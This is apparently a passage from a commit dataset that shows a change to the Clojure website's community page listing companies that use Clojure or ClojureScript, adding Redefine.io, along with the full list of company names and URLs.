http:\/\/www.modelogiq.com\/[modelogiq,opts=nofollow]\n* http:\/\/www.molequedeideias.net\/[Moleque de Ideias,opts=nofollow]\n* https:\/\/www.motiva.ai\/[Motiva AI,opts=nofollow]\n* http:\/\/multis.co\/[Multis,opts=nofollow]\n* http:\/\/www.mysema.com\/[Mysema,opts=nofollow]\n* http:\/\/nemCV.com[nemCV.com,opts=nofollow]\n* https:\/\/www.netflix.com[Netflix,opts=nofollow]\n* https:\/\/www.neustar.biz\/[Neustar,opts=nofollow]\n* http:\/\/nexonit.com[nexonit.com,opts=nofollow]\n* http:\/\/www.nextangles.com[NextAngles,opts=nofollow]\n* https:\/\/nextjournal.com\/[Nextjournal,opts=nofollow]\n* http:\/\/nilenso.com\/[nilenso,opts=nofollow]\n* https:\/\/www.nitor.com[Nitor,opts=nofollow]\n* https:\/\/nederlandsegokkasten.com\/[NLG,opts=nofollow]\n* https:\/\/nomnominsights.com[NomNom Insights,opts=nofollow]\n* https:\/\/www.norled.no\/[Norled,opts=nofollow]\n* http:\/\/lamuz.uz[NowMedia Tech,opts=nofollow]\n* https:\/\/nsd.no[NSD - Norwegian Centre for Research Data,opts=nofollow]\n* https:\/\/www.nubank.com.br\/[Nubank,opts=nofollow]\n* https:\/\/nukomeet.com\/[Nukomeet,opts=nofollow]\n* http:\/\/numerical.co.nz\/[Numerical Brass Computing,opts=nofollow]\n* https:\/\/www.ochedart.com\/[Oche Dart,opts=nofollow]\n* https:\/\/oiiku.com[Oiiku,opts=nofollow]\n* https:\/\/okletsplay.com\/[OkLetsPlay,opts=nofollow]\n* http:\/\/www.omnyway.com\/[Omnyway Inc,opts=nofollow]\n* https:\/\/ona.io[Ona,opts=nofollow]\n* https:\/\/onfido.com\/gb\/[Onfido,opts=nofollow]\n* https:\/\/onlinecasinoinformatie.com\/[OnlineCasinoInformatie,opts=nofollow]\n* http:\/\/www.onthemarket.com\/[OnTheMarket,opts=nofollow]\n* https:\/\/opencompany.com\/[OpenCompany,opts=nofollow]\n* http:\/\/OpenSensors.io[OpenSensors.io,opts=nofollow]\n* http:\/\/www.opentable.com\/[OpenTable,opts=nofollow]\n* http:\/\/www.oracle.com[Oracle,opts=nofollow]\n* http:\/\/www.orgsync.com\/[OrgSync,opts=nofollow]\n* https:\/\/www.orkli.com\/en[Orkli,opts=nofollow]\n* https:\/\/www.oscaro.com\/[Oscaro,opts=nofollow]\n* http:\/\/otto.de[Otto,opts=nofollow]\n* http:\/\/ourhub.dk[OurHub,opts=nofollow]\n* http:\/\/www.outpace.com\/[Outpace,opts=nofollow]\n* http:\/\/corp.outpostgames.com\/[Outpost 
Games,opts=nofollow]\n* http:\/\/owsy.com[Owsy,opts=nofollow]\n* https:\/\/oysterlab.ch[Oyster Lab by Alpiq,opts=nofollow]\n* http:\/\/paddleguru.com[PaddleGuru,opts=nofollow]\n* http:\/\/www.bdpanacea.com\/[Panacea Systems,opts=nofollow]\n* https:\/\/www.pandora.com\/[Pandora,opts=nofollow]\n* http:\/\/paper.li[paper.li,opts=nofollow]\n* https:\/\/www.parcelbright.com\/[ParcelBright,opts=nofollow]\n* https:\/\/partsbox.io\/[PartsBox,opts=nofollow]\n* http:\/\/www.passivsystems.com\/[PassivSystems,opts=nofollow]\n* http:\/\/path.com\/[Path,opts=nofollow]\n* http:\/\/paygarden.com[PayGarden,opts=nofollow]\n* https:\/\/paygo.com.br[PayGo,opts=nofollow]\n* https:\/\/www.payoff.com\/[Payoff,opts=nofollow]\n* http:\/\/www.pennymacusa.com[PennyMac,opts=nofollow]\n* https:\/\/pilloxa.com[Pilloxa,opts=nofollow]\n* https:\/\/pisano.co\/[Pisano,opts=nofollow]\n* https:\/\/pitch.com\/[Pitch,opts=nofollow]\n* http:\/\/www.pivotal.io\/[Pivotal Labs,opts=nofollow]\n* https:\/\/www.pkc.io\/[PKC,opts=nofollow]\n* http:\/\/www.pointslope.com[Point Slope,opts=nofollow]\n* https:\/\/pol.is\/about\/[Pol.is,opts=nofollow]\n* http:\/\/dmarc.postmarkapp.com\/[Postmark,opts=nofollow]\n* https:\/\/precursorapp.com\/[Precursor,opts=nofollow]\n* http:\/\/www.premium.nl\/[Premium Business Consultants BV,opts=nofollow]\n* http:\/\/prime.vc\/[Prime.vc,opts=nofollow]\n* http:\/\/www.print.io\/[Print.IO,opts=nofollow]\n* https:\/\/projectmaterials.com[projectmaterials.com,opts=nofollow]\n* http:\/\/projexsys.com\/[Projexsys,opts=nofollow]\n* https:\/\/www.protopie.io\/[ProtoPie,opts=nofollow]\n* https:\/\/publizr.com\/[Publizr,opts=nofollow]\n* http:\/\/puppetlabs.com\/[Puppet Labs,opts=nofollow]\n* https:\/\/www.purposefly.com\/[PurposeFly,opts=nofollow]\n* https:\/\/quartethealth.com\/[Quartet Health,opts=nofollow]\n* http:\/\/www.quintype.com\/[Quintype,opts=nofollow]\n* https:\/\/qvantel.com\/[Qvantel,opts=nofollow]\n* http:\/\/www.radiantlabs.co[Radiant Labs,opts=nofollow]\n* https:\/\/radioactive.sg[RADIOactive,opts=nofollow]\n* http:\/\/reaktor.com\/[Reaktor,opts=nofollow]\n* https:\/\/www.redhat.com\/[Red Hat,opts=nofollow]\n* https:\/\/www.redpineapplemedia.com\/[Red Pineapple Media,opts=nofollow]\n* https:\/\/www.reifyhealth.com\/[Reify Health,opts=nofollow]\n* http:\/\/rentpath.com\/[RentPath,opts=nofollow]\n* http:\/\/jbrj.gov.br\/[Rio de Janeiro Botanical Garden,opts=nofollow]\n* http:\/\/rjmetrics.com\/[RJMetrics,opts=nofollow]\n* http:\/\/www.romr.com\/[R\u014dmr,opts=nofollow]\n* http:\/\/rocketfuel.com\/[Rocket Fuel,opts=nofollow]\n* https:\/\/rokt.com\/[ROKT,opts=nofollow]\n* http:\/\/www.roomkey.com\/[Room Key,opts=nofollow]\n* http:\/\/roomstorm.com\/[Roomstorm,opts=nofollow]\n* https:\/\/www.rowdylabs.com[Rowdy Labs,opts=nofollow]\n* http:\/\/roximity.com\/[ROXIMITY,opts=nofollow]\n* https:\/\/www.rts.ch\/info[RTS,opts=nofollow]\n* http:\/\/www.salesforce.com\/[Salesforce,opts=nofollow]\n* https:\/\/www.salliemae.com\/[Sallie Mae,opts=nofollow]\n* https:\/\/www.sap.com[SAP,opts=nofollow]\n* https:\/\/www.concur.com\/[SAP Concur,opts=nofollow]\n* http:\/\/www.twitter-fu.com\/[Sapiens Sapiens,opts=nofollow]\n* https:\/\/www.schibsted.com\/[Schibsted,opts=nofollow]\n* http:\/\/www.shareablee.com\/[Shareablee,opts=nofollow]\n* https:\/\/sharetribe.com\/[Sharetribe,opts=nofollow]\n* http:\/\/shore.li\/[shore.li,opts=nofollow]\n* http:\/\/www.signafire.com[Signafire,opts=nofollow]\n* http:\/\/signal.uk.com\/[Signal,opts=nofollow]\n* https:\/\/www.siili.com\/[Siili Solutions,opts=nofollow]\n* 
http:\/\/docs.svbplatform.com\/[Silicon Valley Bank,opts=nofollow]\n* http:\/\/silverline.mobi\/[Silverline Mobile,opts=nofollow]\n* http:\/\/www.silverpond.com.au\/[Silverpond,opts=nofollow]\n* https:\/\/www.simple.com\/[Simple,opts=nofollow]\n* https:\/\/www.simply.co.za[Simply,opts=nofollow]\n* http:\/\/www.sinapsi.com\/[Sinapsi,opts=nofollow]\n* http:\/\/us.sios.com\/[SIOS Technology Corp.,opts=nofollow]\n* https:\/\/sixsq.com\/[SixSq,opts=nofollow]\n* http:\/\/smilebooth.com\/[Smilebooth,opts=nofollow]\n* http:\/\/smxemail.com\/[SMX,opts=nofollow]\n* https:\/\/socialsuperstore.com\/[Social Superstore,opts=nofollow]\n* https:\/\/www.solita.fi\/[Solita,opts=nofollow]\n* https:\/\/soundcloud.com[Soundcloud,opts=nofollow]\n* https:\/\/www.soyoulearn.com\/[SoYouLearn,opts=nofollow]\n* https:\/\/www.sparkfund.co\/[SparkFund,opts=nofollow]\n* http:\/\/www.spinney.io\/[Spinney,opts=nofollow]\n* https:\/\/www.spotify.com[Spotify,opts=nofollow]\n* https:\/\/www.squarevenue.com[SquareVenue,opts=nofollow]\n* https:\/\/exchange.staples.com\/[Staples Exchange,opts=nofollow]\n* http:\/\/www.staples-sparx.com\/[Staples Sparx,opts=nofollow]\n* https:\/\/starcity.com\/careers[Starcity,opts=nofollow]\n* https:\/\/www.stardog.com\/[Stardog,opts=nofollow]\n* https:\/\/status.im\/[Status,opts=nofollow]\n* http:\/\/status.im[Status Research & Development GmbH,opts=nofollow]\n* https:\/\/www.stitchdata.com\/[Stitch,opts=nofollow]\n* http:\/\/structureddynamics.com\/[Structured Dynamics,opts=nofollow]\n* https:\/\/www.studio71.com\/us\/[Studio71,opts=nofollow]\n* http:\/\/www.studyflow.nl[Studyflow,opts=nofollow]\n* http:\/\/about.stylitics.com\/[Stylitics,opts=nofollow]\n* https:\/\/www.suiteness.com\/contact_us[Suiteness,opts=nofollow]\n* http:\/\/www.suprematic.net\/[Suprematic,opts=nofollow]\n* https:\/\/swiftkey.com\/[SwiftKey (Microsoft),opts=nofollow]\n* http:\/\/swirrl.com\/[Swirrl,opts=nofollow]\n* https:\/\/synple.eu\/en\/index[Synple,opts=nofollow]\n* http:\/\/www.synqrinus.com\/[Synqrinus,opts=nofollow]\n* https:\/\/www.taiste.com[Taiste,opts=nofollow]\n* https:\/\/takeoff.com[Takeoff Technologies,opts=nofollow]\n* http:\/\/talentads.net\/[TalentAds,opts=nofollow]\n* http:\/\/www.tappcommerce.com\/[Tapp Commerce,opts=nofollow]\n* https:\/\/www.tcgplayer.com\/[TCGplayer,opts=nofollow]\n* http:\/\/www.technoidentity.com\/[TechnoIdentity,opts=nofollow]\n* http:\/\/www.teradata.com[Teradata,opts=nofollow]\n* http:\/\/testdouble.com\/[Test Double,opts=nofollow]\n* https:\/\/climate.com\/[The Climate Corporation,opts=nofollow]\n* http:\/\/www.thinktopic.com\/[ThinkTopic,opts=nofollow]\n* https:\/\/github.com\/thinstripe[Thinstripe,opts=nofollow]\n* http:\/\/www.thoughtworks.com\/[ThoughtWorks,opts=nofollow]\n* http:\/\/www.threatgrid.com\/[ThreatGRID (acquired by Cisco),opts=nofollow]\n* https:\/\/www.todaqfinance.com\/[TODAQ Financial,opts=nofollow]\n* http:\/\/www.tokenmill.co\/[TokenMill,opts=nofollow]\n* https:\/\/www.tool2match.nl[Tool2Match,opts=nofollow]\n* https:\/\/www.topmonks.com\/[TopMonks,opts=nofollow]\n* https:\/\/touk.pl[TouK,opts=nofollow]\n* https:\/\/toyokumo.co.jp\/[TOYOKUMO,opts=nofollow]\n* https:\/\/www.thetrainline.com\/[Trainline,opts=nofollow]\n* https:\/\/trank.no\/[T-Rank,opts=nofollow]\n* http:\/\/www.trioptima.com\/[TriOptima,opts=nofollow]\n* https:\/\/www.troywest.com\/[Troy-West,opts=nofollow]\n* https:\/\/truckerpath.com[Trucker Path,opts=nofollow]\n* http:\/\/www.twosigma.com\/[Two Sigma,opts=nofollow]\n* https:\/\/www.ufst.dk[Udviklings- og 
forenklingsstyrelsen,opts=nofollow]\n* https:\/\/unacast.com\/[Unacast,opts=nofollow]\n* http:\/\/unbounce.com\/[Unbounce,opts=nofollow]\n* https:\/\/unfold.com\/[Unfold,opts=nofollow]\n* http:\/\/www.uhn.ca\/[University Health Network,opts=nofollow]\n* http:\/\/life.uni-leipzig.de[University Leipzig - Research Centre for Civilization Diseases (LIFE),opts=nofollow]\n* https:\/\/www.uplift.com[UpLift,opts=nofollow]\n* http:\/\/www.upworthy.com\/[Upworthy,opts=nofollow]\n* https:\/\/www.urbandictionary.com[Urban Dictionary,opts=nofollow]\n* http:\/\/ustream.tv\/[Ustream,opts=nofollow]\n* http:\/\/www.uswitch.com\/[uSwitch,opts=nofollow]\n* https:\/\/vakantiediscounter.nl[VakantieDiscounter,opts=nofollow]\n* http:\/\/veltio.com.br[Veltio,opts=nofollow]\n* https:\/\/www.verypossible.com[Very,opts=nofollow]\n* https:\/\/verybigthings.com[VeryBigThings,opts=nofollow]\n* https:\/\/vetd.com[Vetd,opts=nofollow]\n* https:\/\/viasat.com\/[Viasat,opts=nofollow]\n* http:\/\/vigiglobe.com\/[Vigiglobe,opts=nofollow]\n* https:\/\/www.vilect.ai\/[Vilect,opts=nofollow]\n* https:\/\/storrito.com[Vire,opts=nofollow]\n* https:\/\/www.virool.com\/[Virool,opts=nofollow]\n* http:\/\/vitallabs.co\/[Vital Labs,opts=nofollow]\n* https:\/\/www.vodori.com[Vodori,opts=nofollow]\n* http:\/\/www.walmartlabs.com\/[Walmart Labs,opts=nofollow]\n* https:\/\/weave.fi\/[Weave,opts=nofollow]\n* http:\/\/wefarm.org[WeFarm,opts=nofollow]\n* https:\/\/weshop.co.uk[WeShop,opts=nofollow]\n* https:\/\/www.whibse.com[Whibse,opts=nofollow]\n* https:\/\/pro.whitepages.com\/[Whitepages,opts=nofollow]\n* http:\/\/wikidocs.com\/[Wikidocs (acquired by Atlassian),opts=nofollow]\n* http:\/\/wildbit.com\/[Wildbit,opts=nofollow]\n* http:\/\/wit.ai[Wit.ai (acquired by Facebook),opts=nofollow]\n* https:\/\/work.co[Work & Co,opts=nofollow]\n* https:\/\/work.co\/[work.co,opts=nofollow]\n* https:\/\/workframe.com\/[Workframe,opts=nofollow]\n* http:\/\/www.workinvoice.it\/[Workinvoice,opts=nofollow]\n* https:\/\/www.works-hub.com[WorksHub,opts=nofollow]\n* https:\/\/worldsinglesnetworks.com\/[World Singles Networks,opts=nofollow]\n* https:\/\/www.xapix.io\/[Xapix GmbH,opts=nofollow]\n* https:\/\/xcoo.jp\/[Xcoo Inc.,opts=nofollow]\n* http:\/\/xnlogic.com[XN Logic,opts=nofollow]\n* http:\/\/yellerapp.com\/[Yeller,opts=nofollow]\n* http:\/\/yetanalytics.com\/[Yet Analytics,opts=nofollow]\n* http:\/\/www.yieldbot.com[Yieldbot,opts=nofollow]\n* http:\/\/yousee.dk\/[Yousee IT Innovation Labs,opts=nofollow]\n* https:\/\/www.youview.com\/[YouView,opts=nofollow]\n* http:\/\/www.yummly.com\/[Yummly,opts=nofollow]\n* http:\/\/www.yuppiechef.com\/[Yuppiechef,opts=nofollow]\n* http:\/\/tech.zalando.com[Zalando,opts=nofollow]\n* http:\/\/www.zendesk.com[Zendesk,opts=nofollow]\n* https:\/\/www.zenfinance.com.br\/[Zen Finance,opts=nofollow]\n* https:\/\/ilovezoona.com\/[Zoona,opts=nofollow]\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9044f83a85f4ee0665e140059e2f71cbc69d72a6","subject":"adding Redefine.io","message":"adding Redefine.io","repos":"clojure\/clojure-site","old_file":"content\/community\/companies.adoc","new_file":"content\/community\/companies.adoc","new_contents":"= Companies\nAlex Miller\n2017-03-15\n:type: community\n:toc: macro\n:icons: font\n\nBelow is a partial list of some companies using Clojure or ClojureScript. Most of this information comes from direct contacts, presentations, or other online resources. 
If you would like to be added or removed from this list, please contact __clojure@cognitect.com__ or submit a pull request to the https:\/\/github.com\/clojure\/clojure-site[site repository].\n\nAlso, check out the <<success_stories#,Clojure Success Stories>> and <<community_stories#,Community Stories>> pages!\n\n* 3e.eu\n* 8th Light\n* aclaimant\n* Active Group GmbH\n* Adaptly\n* AdGoji\n* Adobe\n* AdStage\n* Advance Auto Parts\n* Adzerk\n* AGA\n* AgentsMutual\/OnTheMarket\n* Agiliway\n* Airloyal\n* Ajira\n* Akamai\n* Akvo Foundation\n* Amazon\n* Amperity\n* Animalia\n* Annadale Technologies\n* Answers.com\n* Anywhere.com\n* Apex Data Solutions\n* Apple\n* AppsFlyer\n* AppSmiths\n* Appsnsites\n* Arc Studio Pro\n* Ardoq\n* ATA LLC\n* Atomist\n* Attendify\n* Audience Republic\n* Australia Post\n* Autheos\n* BandSquare\n* Banzai\n* baresquare\n* Barracuda\n* BaseFEX\n* Beanstalk\n* Beary Innovative\n* BeOpinion\n* bevuta\n* BGPworks\n* BillFront\n* BIMwelt Systems\n* Bloom\n* Blumbird GmbH\n* BookWell\n* Boundless Geo\n* Brainsfeed\n* Braintree Payments (acquired by PayPal)\n* Breeze EHR\n* BrickAlloy\n* Brightin\n* BroadbandUK\n* BroadPeak\n* Buddy\n* BUGS Bioscience\n* Buy Happy\n* buzzlers.com\n* CambioScience\n* Cambium Consulting\n* Capital One\n* cardforcoin\n* Carousel Apps\n* Cars.co.za\n* carwow\n* CA Technologies\n* Cellusys\n* Centriq\n* CENX\n* Cerner\n* Cervest Ltd.\n* CFPB (Credit Financial Protection Bureau)\n* Chariot Solutions\n* Chartbeat\n* Cicayda\n* CircleCI\n* Cisco\n* Citi\n* ClanHR\n* ClearCoin\n* Climate Corp (acquired by Monsanto)\n* Clockworks\n* CloudGears\n* CloudRepo\n* Clubhouse\n* Code54\n* codecentric\n* Co(de)factory\n* CodeScene\n* Codurance\n* Cognician\n* Cognitect\n* CollBox\n* Collective Digital Studio\n* Commonwealth Robotics\n* Commsor\n* Compute Software\n* Condense\n* Consumer Reports\n* CREATE.21st century\n* Crossbeam\n* Crossref\n* CROWD\n* Cryptowerk\n* Curbside\n* Cycloid\n* CyCognito\n* Daily Mail MailOnline\n* Database Labs\n* Datacraft\n* DataSnap.io\n* Datomic\n* DBS Bank\n* Debreuck Neirynck (DN)\n* Deep Impact\n* Degree9\n* Democracy Works\n* Deps\n* Designedly\n* Deutsche Bank\n* Devatics\n* Dewise\n* Diagnosia\n* Discendum ltd\n* Dividend Finance\n* DocSolver\n* Doctor Evidence\n* Doctronic\n* DOV-E\n* dploy.io\n* Dream to Learn\n* DRW Trading Group\n* Dyne.org\n* eBay\n* Ekata\n* Element 84\n* Empear\n* English Language iTutoring\n* Enterlab\n* Entrepreneur First\n* Event Fabric\n* Eventum\n* Evolta\n* Exoscale\n* Eyeota\n* Facebook\n* Facjure\n* Factual\n* FarBetter\n* Fierce.\n* Finalist\n* Finity AI\n* Flexiana\n* Flocktory\n* Flowa\n* Flybot\n* FORMCEPT\n* Framed Data\n* Freshcode\n* FullContact\n* Functional Works\n* Funding Circle\n* Futurice\n* Fy!\n* Gaiwan\n* GetContented\n* GetSet\n* Gmaven\n* GoCatch\n* Gofore\n* Goizper Group\n* GO-JEK\n* GoldFynch\n* Goodhertz\n* GoOpti\n* Gracenote\n* Grammarly\n* greenlabs\n* GreenPowerMonitor\n* Groupon\n* Guaranteed Rate\n* handcheque\n* HappyMoney\n* Hashrocket\n* healthfinch\n* HealthSamurai\n* Helpshift\n* Hendrick Automotive Group\n* Hero Marketing\n* Heroku\n* Hexawise\n* #Homescreen\n* Huobi Global\n* IB5k\n* ICM Consulting\n* IG\n* Imatic\n* Immute\n* Indaba Music\n* InnoQ\n* Inspire Fitness\n* instadeq\n* Intent Media\n* InterWare\n* Intropica\n* Intuit\n* iPlant Collaborative\n* IPRally Technologies\n* IRIS.TV\n* J.Crew\n* JESI\n* JustOn GmbH\n* JUXT\n* Kane LPI\n* Kasta\n* Kepler 16\n* Kira\n* Klarna\n* Kleene.ai\n* Knowledge E\n* Kodemaker\n* Kwelia\n* Ladder\n* Ladders\n* 
LambdaWerk\n* Latacora\n* Leancloud.cn\n* Leanheat\n* Lemmings\n* LemonPI\n* LendUp\n* Level Money\n* Lifebooker\n* Liftoff\n* LightMesh\n* Likely\n* LINE\n* LinguaTrip\n* Linkfluence\n* Listora\n* LiveOps\n* LivingSocial\n* Localize.city\n* Locarise\n* Logic Soft Pvt. Ltd.\n* LonoCloud (acquired by ViaSat)\n* LookingGlass Cyber Solutions\n* Loway\n* Lucid IT Consulting LLC\n* Lumanu\n* Luminare\n* LunchBox Sessions\n* Macrofex\n* MACROFEX LLC\n* Madriska Inc.\n* Magnet\n* Main Street Genome\n* Makimo\n* Marktbauer\/Comida da gente\n* Mastodon C\n* Mayvenn\n* Mazira\n* Mediquest\n* MeeWee\n* Merantix\n* Metabase\n* Metail\n* Metosin\n* Minoro\n* Mixpanel\n* MixRadio\n* Mobot\n* modelogiq\n* Moleque de Ideias\n* Motiva AI\n* MoveNation\n* Multis\n* Mysema\n* nemCV.com\n* Netflix\n* Neustar\n* nexonit.com\n* NextAngles\n* Nextjournal\n* nilenso\n* Nitor\n* NLG\n* NomNom Insights\n* Norled\n* NowMedia Tech\n* NSD - Norwegian Centre for Research Data\n* Nubank\n* Nukomeet\n* Numerical Brass Computing\n* Obrizum Group Ltd.\n* Oche Dart\n* Oiiku\n* OkLetsPlay\n* Omnyway Inc\n* Ona\n* Onfido\n* OnlineCasinoInformatie\n* OnTheMarket\n* OpenCompany\n* OpenSensors.io\n* OpenTable\n* Oracle\n* OrgSync\n* Orkli\n* Oscaro\n* Otto\n* OurHub\n* Outpace\n* Outpost Games\n* Owsy\n* Oyster Lab by Alpiq\n* PaddleGuru\n* Panacea Systems\n* Pandora\n* paper.li\n* ParcelBright\n* PartsBox\n* PassivSystems\n* Path\n* PayGarden\n* PayGo\n* Payoff\n* PennyMac\n* Pilloxa\n* Pisano\n* Pitch\n* Pivotal Labs\n* PKC\n* Point Slope\n* Pol.is\n* Postmark\n* PractiTest\n* Precursor\n* Premium Business Consultants BV\n* Prime.vc\n* Print.IO\n* projectmaterials.com\n* Projexsys\n* ProtoPie\n* Publizr\n* Puppet Labs\n* PurposeFly\n* Quartet Health\n* Quintype\n* Qvantel\n* Radiant Labs\n* RADIOactive\n* Reaktor\n* Red Hat\n* Red Pineapple Media\n* Redefine.io\n* Reify Health\n* RentPath\n* Ride Health\n* Rio de Janeiro Botanical Garden\n* RJMetrics\n* R\u014dmr\n* Roam Research\n* Rocket Fuel\n* ROKT\n* Room Key\n* Roomstorm\n* Rowdy Labs\n* ROXIMITY\n* RTS\n* Salesforce\n* Sallie Mae\n* SAP\n* SAP Concur\n* Sapiens Sapiens\n* Schibsted\n* SEB (Skandinaviska Enskilda Banken)\n* Shareablee\n* Sharetribe\n* shore.li\n* Signafire\n* Signal\n* Siili Solutions\n* Silicon Valley Bank\n* Silverline Mobile\n* Silverpond\n* Simple\n* Simply\n* Sinapsi\n* SIOS Technology Corp.\n* SixSq\n* Skipp\n* Smilebooth\n* SMX\n* Social Superstore\n* Solita\n* Soundcloud\n* SoYouLearn\n* SparkFund\n* Spatial Informatics Group\n* Spinney\n* Splash Financial\n* Spotify\n* SquareVenue\n* Staples Exchange\n* Staples Sparx\n* Starcity\n* Stardog\n* Status\n* Status Research & Development GmbH\n* Stitch\n* StreetLinx (acquired by Symphony)\n* Structured Dynamics\n* Studio71\n* Studyflow\n* Stylitics\n* Suiteness\n* Suprematic\n* SwiftKey (Microsoft)\n* Swirrl\n* Swym\n* Synple\n* Synqrinus\n* Taiste\n* Takeoff Technologies\n* TalentAds\n* Tapp Commerce\n* TCGplayer\n* TechnoIdentity\n* Teradata\n* Test Double\n* The Climate Corporation\n* ThinkTopic\n* Thinstripe\n* ThoughtWorks\n* ThreatGRID (acquired by Cisco)\n* TODAQ Financial\n* TokenMill\n* Tool2Match\n* TopMonks\n* TouK\n* TOYOKUMO\n* Trainline\n* T-Rank\n* Treasury Prime\n* TriOptima\n* Troy-West\n* Trucker Path\n* Two Sigma\n* Udviklings- og forenklingsstyrelsen\n* Unacast\n* Unbounce\n* Unfold\n* University Health Network\n* University Leipzig - Research Centre for Civilization Diseases (LIFE)\n* UpLift\n* Upworthy\n* Urban Dictionary\n* Ustream\n* uSwitch\n* VakantieDiscounter\n* Veltio\n* 
Very\n* VeryBigThings\n* Vetd\n* Verrency\n* Viasat\n* Vigiglobe\n* Vilect\n* Vire\n* Virool\n* Vital Labs\n* Vodori\n* Walmart Labs\n* Weave\n* WeFarm\n* WeShop\n* Whibse\n* Whimsical\n* Whitepages\n* Wikidocs (acquired by Atlassian)\n* Wildbit\n* Wit.ai (acquired by Facebook)\n* Work & Co\n* work.co\n* Workframe\n* Workinvoice\n* WorksHub\n* World Singles Networks\n* Xapix GmbH\n* Xcoo Inc.\n* XN Logic\n* Yeller\n* Yet Analytics\n* Yieldbot\n* Yousee IT Innovation Labs\n* YouView\n* Yummly\n* Yuppiechef\n* Zalando\n* Zendesk\n* Zen Finance\n* Zoona\n","old_contents":"= Companies\nAlex Miller\n2017-03-15\n:type: community\n:toc: macro\n:icons: font\n\nBelow is a partial list of some companies using Clojure or ClojureScript. Most of this information comes from direct contacts, presentations, or other online resources. If you would like to be added or removed from this list, please contact __clojure@cognitect.com__ or submit a pull request to the https:\/\/github.com\/clojure\/clojure-site[site repository].\n\nAlso, check out the <<success_stories#,Clojure Success Stories>> and <<community_stories#,Community Stories>> pages!\n\n* 3e.eu\n* 8th Light\n* aclaimant\n* Active Group GmbH\n* Adaptly\n* AdGoji\n* Adobe\n* AdStage\n* Advance Auto Parts\n* Adzerk\n* AGA\n* AgentsMutual\/OnTheMarket\n* Agiliway\n* Airloyal\n* Ajira\n* Akamai\n* Akvo Foundation\n* Amazon\n* Amperity\n* Animalia\n* Annadale Technologies\n* Answers.com\n* Anywhere.com\n* Apex Data Solutions\n* Apple\n* AppsFlyer\n* AppSmiths\n* Appsnsites\n* Arc Studio Pro\n* Ardoq\n* ATA LLC\n* Atomist\n* Attendify\n* Audience Republic\n* Australia Post\n* Autheos\n* BandSquare\n* Banzai\n* baresquare\n* Barracuda\n* BaseFEX\n* Beanstalk\n* Beary Innovative\n* BeOpinion\n* bevuta\n* BGPworks\n* BillFront\n* BIMwelt Systems\n* Bloom\n* Blumbird GmbH\n* BookWell\n* Boundless Geo\n* Brainsfeed\n* Braintree Payments (acquired by PayPal)\n* Breeze EHR\n* BrickAlloy\n* Brightin\n* BroadbandUK\n* BroadPeak\n* Buddy\n* BUGS Bioscience\n* Buy Happy\n* buzzlers.com\n* CambioScience\n* Cambium Consulting\n* Capital One\n* cardforcoin\n* Carousel Apps\n* Cars.co.za\n* carwow\n* CA Technologies\n* Cellusys\n* Centriq\n* CENX\n* Cerner\n* Cervest Ltd.\n* CFPB (Credit Financial Protection Bureau)\n* Chariot Solutions\n* Chartbeat\n* Cicayda\n* CircleCI\n* Cisco\n* Citi\n* ClanHR\n* ClearCoin\n* Climate Corp (acquired by Monsanto)\n* Clockworks\n* CloudGears\n* CloudRepo\n* Clubhouse\n* Code54\n* codecentric\n* Co(de)factory\n* CodeScene\n* Codurance\n* Cognician\n* Cognitect\n* CollBox\n* Collective Digital Studio\n* Commonwealth Robotics\n* Commsor\n* Compute Software\n* Condense\n* Consumer Reports\n* CREATE.21st century\n* Crossbeam\n* Crossref\n* CROWD\n* Cryptowerk\n* Curbside\n* Cycloid\n* CyCognito\n* Daily Mail MailOnline\n* Database Labs\n* Datacraft\n* DataSnap.io\n* Datomic\n* DBS Bank\n* Debreuck Neirynck (DN)\n* Deep Impact\n* Degree9\n* Democracy Works\n* Deps\n* Designedly\n* Deutsche Bank\n* Devatics\n* Dewise\n* Diagnosia\n* Discendum ltd\n* Dividend Finance\n* DocSolver\n* Doctor Evidence\n* Doctronic\n* DOV-E\n* dploy.io\n* Dream to Learn\n* DRW Trading Group\n* Dyne.org\n* eBay\n* Ekata\n* Element 84\n* Empear\n* English Language iTutoring\n* Enterlab\n* Entrepreneur First\n* Event Fabric\n* Eventum\n* Evolta\n* Exoscale\n* Eyeota\n* Facebook\n* Facjure\n* Factual\n* FarBetter\n* Fierce.\n* Finalist\n* Finity AI\n* Flexiana\n* Flocktory\n* Flowa\n* Flybot\n* FORMCEPT\n* Framed Data\n* Freshcode\n* FullContact\n* Functional Works\n* 
Funding Circle\n* Futurice\n* Fy!\n* Gaiwan\n* GetContented\n* GetSet\n* Gmaven\n* GoCatch\n* Gofore\n* Goizper Group\n* GO-JEK\n* GoldFynch\n* Goodhertz\n* GoOpti\n* Gracenote\n* Grammarly\n* greenlabs\n* GreenPowerMonitor\n* Groupon\n* Guaranteed Rate\n* handcheque\n* HappyMoney\n* Hashrocket\n* healthfinch\n* HealthSamurai\n* Helpshift\n* Hendrick Automotive Group\n* Hero Marketing\n* Heroku\n* Hexawise\n* #Homescreen\n* Huobi Global\n* IB5k\n* ICM Consulting\n* IG\n* Imatic\n* Immute\n* Indaba Music\n* InnoQ\n* Inspire Fitness\n* instadeq\n* Intent Media\n* InterWare\n* Intropica\n* Intuit\n* iPlant Collaborative\n* IPRally Technologies\n* IRIS.TV\n* J.Crew\n* JESI\n* JustOn GmbH\n* JUXT\n* Kane LPI\n* Kasta\n* Kepler 16\n* Kira\n* Klarna\n* Kleene.ai\n* Knowledge E\n* Kodemaker\n* Kwelia\n* Ladder\n* Ladders\n* LambdaWerk\n* Latacora\n* Leancloud.cn\n* Leanheat\n* Lemmings\n* LemonPI\n* LendUp\n* Level Money\n* Lifebooker\n* Liftoff\n* LightMesh\n* Likely\n* LINE\n* LinguaTrip\n* Linkfluence\n* Listora\n* LiveOps\n* LivingSocial\n* Localize.city\n* Locarise\n* Logic Soft Pvt. Ltd.\n* LonoCloud (acquired by ViaSat)\n* LookingGlass Cyber Solutions\n* Loway\n* Lucid IT Consulting LLC\n* Lumanu\n* Luminare\n* LunchBox Sessions\n* Macrofex\n* MACROFEX LLC\n* Madriska Inc.\n* Magnet\n* Main Street Genome\n* Makimo\n* Marktbauer\/Comida da gente\n* Mastodon C\n* Mayvenn\n* Mazira\n* Mediquest\n* MeeWee\n* Merantix\n* Metabase\n* Metail\n* Metosin\n* Minoro\n* Mixpanel\n* MixRadio\n* Mobot\n* modelogiq\n* Moleque de Ideias\n* Motiva AI\n* MoveNation\n* Multis\n* Mysema\n* nemCV.com\n* Netflix\n* Neustar\n* nexonit.com\n* NextAngles\n* Nextjournal\n* nilenso\n* Nitor\n* NLG\n* NomNom Insights\n* Norled\n* NowMedia Tech\n* NSD - Norwegian Centre for Research Data\n* Nubank\n* 